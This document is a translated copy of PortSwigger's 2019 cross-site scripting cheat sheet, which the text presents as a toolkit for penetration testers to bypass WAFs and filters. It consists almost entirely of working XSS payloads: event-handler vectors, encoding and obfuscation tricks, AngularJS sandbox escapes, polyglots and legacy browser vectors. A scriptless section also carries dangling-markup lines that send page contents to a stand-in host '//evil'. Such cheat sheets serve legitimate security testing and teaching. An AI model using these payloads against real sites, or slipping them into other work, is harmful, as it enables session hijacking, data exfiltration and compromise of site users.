Cross-site scripting (XSS) cheat sheet-2019 version


This cross-site scripting (XSS) cheat sheet collects a large number of XSS attack vectors, covering event handlers, protocols, special attributes, restricted characters, encodings, sandbox escapes and other techniques that penetration testers use to bypass WAFs and filtering mechanisms.

Translator's note: the original text is updated regularly (2019) by PortSwigger's Web Security Academy. Yes, it is the company that developed the well-known penetration-testing tool Burp Suite. Last updated: Friday, November 8, 2019 at 10:58:07.

Event handlers

Event handlers that do not require user interaction

Triggered when an element is activated (IE)

<a id=x tabindex=1 onactivate=alert(1)></a>

Triggered after the page is printed (Chrome, Firefox, IE)

<body onafterprint=alert(1)>

Triggered when a CSS animation is cancelled (Firefox)

<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a>

Triggered when a CSS animation ends (Chrome, Firefox, IE, Safari)

<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>

Triggered when a CSS animation repeats (Chrome, Firefox, IE, Safari)

<style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a>

Triggered when a CSS animation starts (Chrome, Firefox, IE, Safari)

<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a>

Triggered before an element is activated (IE)

<a id=x tabindex=1 onbeforeactivate=alert(1)></a>

Triggered before an element is deactivated (IE)

<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>

Triggered before the page is printed (Chrome, Firefox, IE)

<body onbeforeprint=alert(1)>

Triggered after the URL changes (Chrome)

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

Triggered when an SVG animation starts (Chrome, Firefox, Safari)

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

Triggered when an element loses focus (Chrome, IE, Safari)

<a onblur=alert(1) id=x tabindex=1></a><input autofocus>

Triggered when the marquee bounces (Firefox, IE)

<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>

Triggered when the resource can be played (Chrome, Firefox, IE, Safari)

<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Triggered when enough data has loaded to play the resource to the end (Chrome, Firefox, IE, Safari)

<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>

Triggered when an element is deactivated (IE)

<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>

Triggered when the resource has finished playing (Chrome, Firefox, IE, Safari)

<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Triggered when the resource fails to load or causes an error (Chrome, Firefox, IE, Safari)

<audio src/onerror=alert(1)>

Triggered when the marquee finishes (Firefox, IE)

<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>

Triggered when the element receives focus (Chrome, IE, Safari)

<a id=x tabindex=1 onfocus=alert(1)></a>

Triggered when the element receives focus (Chrome, IE, Safari)

<a id=x tabindex=1 onfocusin=alert(1)></a>

Triggered when the element loses focus (Chrome, IE, Safari)

<a onfocusout=alert(1) id=x tabindex=1></a><input autofocus>

Triggered when the hash changes (Chrome, Firefox, IE, Safari)

<body onhashchange="alert(1)">

Triggered when an element is loaded (Safari)

<svg><a onload=alert(1)></a>

Triggered when the first frame is loaded (Chrome, Firefox, IE, Safari)

<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Triggered when metadata is loaded (Chrome, Firefox, IE, Safari)

<audio autoplay onloadedmetadata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Triggered when the element has finished loading (Firefox)

<image src=validimage.png onloadend=alert(1)>

Triggered when the element starts loading (Firefox)

<image src=validimage.png onloadstart=alert(1)>

Triggered when a message event is received from a postMessage call (Chrome, Firefox, IE, Safari)

<body onmessage=alert(1)>

Triggered when the page is shown (Chrome, Firefox, IE, Safari)

<body onpageshow=alert(1)>

Triggered when the resource is played (Chrome, Firefox, IE, Safari)

<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Triggered while the resource is playing (Chrome, Firefox, IE, Safari)

<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Triggered when the history changes (Chrome, Firefox, IE, Safari)

<body onpopstate=alert(1)>

Triggered when an SVG animation repeats (Chrome, Firefox, Safari)

<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />

Triggered when the window is resized (Chrome, Firefox, IE, Safari)

<body onresize="alert(1)">

Triggered when the page scrolls (Chrome, Firefox, IE, Safari)

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

Triggered when the marquee starts (Firefox, IE)

<marquee onstart=alert(1)>XSS</marquee>

Triggered when the timeline changes (Chrome, Firefox, IE, Safari)

<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Triggered when the details tag is expanded (Chrome, Firefox, IE, Safari)

<details ontoggle=alert(1) open>test</details>

Triggered when a CSS transition is cancelled (Firefox)

<style>:target {color:red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a>

Triggered when a CSS transition ends (Chrome)

<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a>

Triggered when a CSS transition starts (Firefox)

<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a>

Triggered when a promise is rejected without a handler (Firefox)

<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>

Triggered while waiting for data (IE)

<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video>

Event handlers that require user interaction

Triggered by a right click or a middle mouse button click (Chrome, Firefox)

<input onauxclick=alert(1)>

Requires copying text (Chrome, Firefox, IE, Safari)

<a onbeforecopy="alert(1)" contenteditable>test</a>

Requires cutting text (Chrome, Firefox, IE, Safari)

<a onbeforecut="alert(1)" contenteditable>test</a>

Requires pasting text (IE)

<a onbeforepaste="alert(1)" contenteditable>test</a>

Requires the value to change (Chrome, Firefox, IE, Safari)

<input onchange=alert(1) value=xss>

Requires clicking the element (Chrome, Firefox, IE, Safari)

<a onclick="alert(1)">test</a>

Triggered by a right click that opens the context menu (Chrome, Firefox, IE, Safari)

<a oncontextmenu="alert(1)">test</a>

Requires copying text (Chrome, Firefox, IE, Safari)

<a oncopy="alert(1)" contenteditable>test</a>

Requires cutting text (Chrome, Firefox, IE, Safari)

<a oncut="alert(1)" contenteditable>test</a>

Triggered when the element is double-clicked (Chrome, Firefox, IE, Safari)

<a ondblclick="alert(1)">test</a>

Requires dragging the element (Chrome, Firefox, IE, Safari)

<a draggable="true" ondrag="alert(1)">test</a>

Requires a drag of the element to finish (Chrome, Firefox, IE, Safari)

<a draggable="true" ondragend="alert(1)">test</a>

Requires a mouse drag (Chrome, Firefox, IE, Safari)

<a draggable="true" ondragenter="alert(1)">test</a>

Requires a mouse drag (Chrome, Firefox, IE, Safari)

<a draggable="true" ondragleave="alert(1)">test</a>

Requires an element to be dragged over it (Chrome, Firefox, IE, Safari)

<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>

Requires a mouse drag (Chrome, Firefox, IE, Safari)

<a draggable="true" ondragstart="alert(1)">test</a>

Requires a draggable element to be dropped (Chrome, Firefox, IE, Safari)

<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a>

Requires the value to change (Chrome, Firefox, IE, Safari)

<input oninput=alert(1) value=xss>

Requires submitting a form containing an element that fails its constraints (such as a required attribute) (Chrome, Firefox, IE, Safari)

<form><input oninvalid=alert(1) required><input type=submit>

Triggered when a key is pressed (Chrome, Firefox, IE, Safari)

<a onkeydown="alert(1)" contenteditable>test</a>

Triggered when a key is pressed (Chrome, Firefox, IE, Safari)

<a onkeypress="alert(1)" contenteditable>test</a>

Triggered when a key is released (Chrome, Firefox, IE, Safari)

<a onkeyup="alert(1)" contenteditable>test</a>

Triggered when a mouse button is pressed (Chrome, Firefox, IE, Safari)

<a onmousedown="alert(1)">test</a>

Triggered when the mouse enters the element (Chrome, Firefox, IE, Safari)

<a onmouseenter="alert(1)">test</a>

Triggered when the mouse leaves the element (Chrome, Firefox, IE, Safari)

<a onmouseleave="alert(1)">test</a>

Requires mouse movement (Chrome, Firefox, IE, Safari)

<a onmousemove="alert(1)">test</a>

Triggered when the mouse moves off the element (Chrome, Firefox, IE, Safari)

<a onmouseout="alert(1)">test</a>

Requires hovering over the element (Chrome, Firefox, IE, Safari)

<a onmouseover="alert(1)">test</a>

Triggered when a mouse button is released (Chrome, Firefox, IE, Safari)

<a onmouseup="alert(1)">test</a>

Requires pasting text (Chrome, Firefox, IE, Safari)

<a onpaste="alert(1)" contenteditable>test</a>

Requires clicking pause on the element (Chrome, Firefox, IE, Safari)

<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Requires a click (Chrome, Firefox, IE, Safari)

<form onreset=alert(1)><input type=reset>

Triggered when the form is submitted with an input of type search (Chrome)

<form><input type=search onsearch=alert(1) value="Hit return" autofocus>

Requires clicking on the element's timeline (Chrome, Firefox, IE, Safari)

<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Requires clicking on the element's timeline (Chrome, Firefox, IE, Safari)

<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Requires selecting text (Chrome, Firefox, IE, Safari)

<input onselect=alert(1) value="XSS" autofocus>

Requires submitting a form (Chrome, Firefox, IE, Safari)

<form onsubmit=alert(1)><input type=submit>

Requires a click anywhere on the page followed by a reload (Chrome)

<svg onunload=window.open('javascript:alert(1)')>

Requires adjusting the volume (Chrome, Firefox, IE, Safari)

<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Triggered when the mouse wheel is used (Chrome, Firefox, IE, Safari)

<body onwheel=alert(1)>

Restricted characters

No parentheses, using exception handling

<script>onerror=alert;throw 1</script>

No parentheses and no semicolons, using exception handling

<script>{onerror=alert}throw 1</script>

No parentheses and no semicolons, using exception handling in an expression

<script>throw onerror=alert,1</script>

No parentheses, using exception handling and eval

<script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses, using exception handling and eval on Firefox

<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses, using ES6 hasInstance with instanceof and eval

<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses, using ES6 hasInstance with instanceof and eval (bracket form)

<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses, using a location redirect

<script>location='javascript:alert\x281\x29'</script>

No strings and no parentheses, using a location redirect

<script>location=name</script>

No parentheses, using a template string

<script>alert`1`</script>

Front-end frameworks

Bootstrap onanimationstart event

<xss class="progress-bar-animated" onanimationstart=alert(1)>

Bootstrap ontransitionend event

<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>

Protocols

Iframe src attribute with the JavaScript protocol

<iframe src="javascript:alert(1)">

Object data attribute with the JavaScript protocol

<object data="javascript:alert(1)">

Embed src attribute with the JavaScript protocol

<embed src="javascript:alert(1)">

Standard JavaScript protocol

<a href="javascript:alert(1)">XSS</a>

The protocol is case-insensitive

<a href="JaVaScript:alert(1)">XSS</a>

The characters \x01-\x20 are allowed before the protocol

<a href=" javascript:alert(1)">XSS</a>

The characters \x09, \x0a and \x0d are allowed inside the protocol

<a href="javas	cript:alert(1)">XSS</a>

The characters \x09, \x0a and \x0d are allowed between the protocol name and the colon

<a href="javascript	:alert(1)">XSS</a>

Xlink namespace in SVG with the JavaScript protocol

<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag using values

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using from and to

<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag

<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol in script src

<script src="data:text/javascript,alert(1)"></script>

SVG script href attribute; no closing script tag needed

<svg><script href="data:text/javascript,alert(1)" />

SVG use element (Chrome, Firefox)

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with a data URL

<script>import('data:text/javascript,alert(1)')</script>

Base tag with the JavaScript protocol rewrites relative URLs

<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable

<math><x href="javascript:alert(1)">blah

Button and formaction

<form><button formaction=javascript:alert(1)>XSS

Input and formaction

<form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action

<form action=javascript:alert(1)><input type=submit value=XSS>

Isindex and formaction

<isindex type=submit formaction=javascript:alert(1)>

Isindex and action

<isindex type=submit action=javascript:alert(1)>

Use element with an external URL

<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x"/></svg>

Other useful attributes

Using the srcdoc attribute

<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities

<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

A click anywhere on the page (even outside the form) submits via the label

<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>

Hidden input: the accesskey attribute enables XSS on elements that are not normally usable

<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Link element: the accesskey attribute enables XSS on elements that are not normally usable

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

The download attribute can save a copy of the current page

<a href=# download="filename.html">Test</a>

Use referrerpolicy to suppress the referrer URL

<img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Special tags

Redirect to another domain

<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta Content-Type charset UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM character (must be at the start of the document) 1

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM character (must be at the start of the document) 2

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM character (must be at the start of the document) 3

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM character (must be at the start of the document) 4

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript with an iframe sandbox

<iframe sandbox src="//portswigger-labs.net"></iframe>

Disable the referrer

<meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8

%C0%BCscript>alert(1)</script>
%E0%80%BCscript>alert(1)</script>
%F0%80%80%BCscript>alert(1)</script>
%F8%80%80%80%BCscript>alert(1)</script>
%FC%80%80%80%80%BCscript>alert(1)</script>

Unicode escape

<script>\u0061lert(1)</script>

Unicode escape, ES6 style

<script>\u{61}lert(1)</script>

Unicode escape, ES6 style with zero padding

<script>\u{0000000061}lert(1)</script>

Hexadecimal JavaScript escape

<script>eval('\x61lert(1)')</script>

Octal encoding

<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>

Decimal encoding with optional semicolon

<a href="javascript:alert(1)">XSS</a><a href="javascript:alert(1)">XSS</a>

SVG script with HTML encoding

<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert(1)</script></svg>
<svg><script>x="",alert(1)//";</script></svg>

Decimal encoding with zero padding

<a href="javascript:alert(1)">XSS</a>

Hexadecimal entity

<a href="javascript:alert(1)">XSS</a>

Hexadecimal encoding without a semicolon when the next character is not a-f0-9

<a href="javascript:alert(1)">XSS</a>
<a href="j avascript:alert(1)">XSS</a>
<a href="j avascript:alert(1)">XSS</a>

Hexadecimal encoding with zero padding

<a href="javascript:alert(1)">XSS</a>

Hexadecimal encoding is case-insensitive

<a href="javascript:alert(1)">XSS</a>

HTML entities

<a href="javascript:alert(1)">XSS</a>
<a href="java script:alert(1)">XSS</a>
<a href="java script:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a>

URL encoding

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>

HTML entities and URL encoding

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>

Obfuscation

Firefox allows a NULL after &

<a href="javascriptjavascript:alert(1)">Firefox</a>

Firefox allows NULLs in named entities

<a href="javascript:alert(1)">Firefox</a>

Firefox allows NULL characters in the comment at the start

<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->

Data protocol in script src with base64

<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Client-side template injection

AngularJS sandbox escapes

Version: 1.0.1-1.1.5

{{constructor.constructor('alert(1)')()}}

Version: 1.0.1-1.1.5 (shorter)

{{$on.constructor('alert(1)')()}}

Version: 1.2.0-1.2.1

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

Version: 1.2.2-1.2.5

{{{}.")));alert(1)//"}}

Version: 1.2.6-1.2.18

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

Version: 1.2.19-1.2.23

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

Version: 1.2.24-1.2.29

{{{}.")));alert(1)//"}}

Version: 1.2.27-1.2.29 / 1.3.0-1.3.20

{{{}.")));alert(1)//"}}

Version: 1.3.0

{{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')));}}

Version: 1.3.3-1.3.18

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}

Version: 1.3.19

{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}

Version: 1.3.20

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

Version: 1.4.0-1.4.9

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

Version: 1.5.0-1.5.8

{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

Version: 1.5.9-1.5.11

{{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}

Version: >= 1.6.0

{{constructor.constructor('alert(1)')()}}

Version: >= 1.6.0 (shorter)

{{$on.constructor('alert(1)')()}}

DOM-based AngularJS sandbox escapes

All versions (Chrome)

<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome), shorter

<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers), shorter

<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

Version: 1.2.0-1.5.0

<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

Scriptless attacks

Background attribute

<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?

Link href stylesheet

<link rel=stylesheet href="//evil?

Link href icon

<link rel=icon href="//evil?

Meta refresh

<meta http-equiv="refresh" content="0; http://evil?

Img and image src

<img src="//evil?
<image src="//evil?

Video using the track element

<video><track default src="//evil?

Video using the source element and src attribute

<video><source src="//evil?

Audio using the source element and src attribute

<audio><source src="//evil?

Input src

<input type=image src="//evil?

Button using formaction

<form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction

<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Form using action

<button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Isindex using the src attribute

<isindex type=image src="//evil?

Isindex using submit

<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Object data

<object data="//evil?

Iframe src

<iframe src="//evil?

Embed src

<embed src="//evil?

Markup consumed by a textarea and posted to an external site

<form><button formaction=//evil>XSS</button><textarea name=x>

Form target passes markup through window.name

<button form=x>XSS</button><form id=x action=//evil target='

Base target passes markup through window.name

<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Formtarget passes markup through window.name

<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Base href passes data

<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Embed src passes data from the page

<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Iframe window name passes data from the page

<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Object window name passes data from the page

<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Frameset window name passes data from the page

<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Polyglots

Polyglot 1

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot 2

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html/" onmouseover=/*<svg/*/onload=alert()//>

Classic vectors

Image src with the JavaScript protocol

<img src="javascript:alert(1)">

Body background with the JavaScript protocol

<body background="javascript:alert(1)">

Iframe data URLs no longer work in modern browsers, where they get a null origin

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol for IE

<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

JScript compact is a smaller version of JS; it is not widely used in IE

<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>

JScript.Encode allows JavaScript to be encoded

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encode allows VBScript to be encoded

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

JavaScript entities for Netscape Navigator

<a title="&{alert(1)}">XSS</a>

Netscape Navigator used to support JavaScript stylesheets

<link href="xss.js" rel=stylesheet type="text/javascript">

Button consuming markup

<form><button name=x formaction=x><b>stealme

IE9 select element and plaintext consuming markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox <= 2 only

<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">

XBL also works with a data URL in Firefox 3.5

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)"/>

CSS expression, IE <= 7

<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allows = instead of :

<div style=xss=expression(alert(1))>
<div style="color=red">test</div>

Behaviors in IE's older document modes

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Function event handlers supported in older versions of IE

<script>function window.onload(){alert(1);}</script>
<script>function window::onload(){alert(1);}</script>
<script>function win.loc(){}</script>
<body><script>function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}</script></body>
<body><script>function document.body.innerHTML(){x="<img src=1 onerror=alert(1)>";}</script></body>

GreyMagic HTML+TIME exploit (no longer works, even in document mode 5)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Original address: portswigger.net/web-securit...